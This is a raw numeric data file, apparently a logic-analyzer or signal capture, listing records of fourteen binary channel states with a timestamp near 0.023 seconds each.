1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089372e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089396e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089448e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089472e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089648e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089672e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089848e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089872e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090048e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090072e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090248e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090272e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090372e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090396e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090448e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090472e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090648e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090672e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090848e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090872e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3090972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3090996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091048e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091072e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091248e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091272e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091372e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091396e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091448e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091472e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091648e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091672e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091848e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091872e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3091972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3091996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3092020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3092048e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3092072e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3092096e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3092120e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3092144e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3092172e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.3215860e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.3216040e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216044e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,2.3216076e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216100e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3216388e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3216432e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.3216460e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,2.3216484e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.3216508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216516e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3216532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216556e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.3216564e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,2.3216580e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3216632e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3216660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3216684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3216692e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3216708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3216732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3216756e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3216764e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3216780e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3216812e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3216832e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3216860e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3216884e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3216908e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3216916e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3216932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3216956e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3216964e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3216980e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217032e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217060e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217084e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217116e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217156e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217180e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217232e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217308e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217312e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217332e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217356e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217364e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217380e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217432e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217460e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217484e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217508e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217532e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217556e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217580e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217632e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217660e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217684e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217708e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217716e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3217756e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3217780e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217812e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217832e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217860e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217884e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217908e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217932e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3217956e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3217980e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218032e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218156e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218164e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3218180e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218232e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218356e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218380e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218432e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218460e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3218484e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218516e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218556e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218564e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3218580e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218612e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3218632e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218660e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3218684e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3218708e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218716e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218756e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218780e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218832e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3218956e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3218988e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3219012e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3219036e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3219060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219068e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219136e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219188e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3219212e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.3219236e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.3219260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219268e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219336e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219388e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219536e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219560e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219588e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219736e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219788e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219936e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3219960e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3219988e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220136e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220188e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220336e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220388e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220536e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220560e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220588e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220736e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220788e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220936e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3220956e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3220984e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221136e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221156e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221336e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221356e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221536e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221556e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221736e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221756e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221936e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3221956e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3221984e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222156e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222336e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222356e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222536e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222556e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222632e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3222732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3222756e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3347764e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3347940e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,2.3347956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3347980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3348300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3348328e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3348380e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3348404e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3348452e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.3348476e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.3348528e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348556e-02 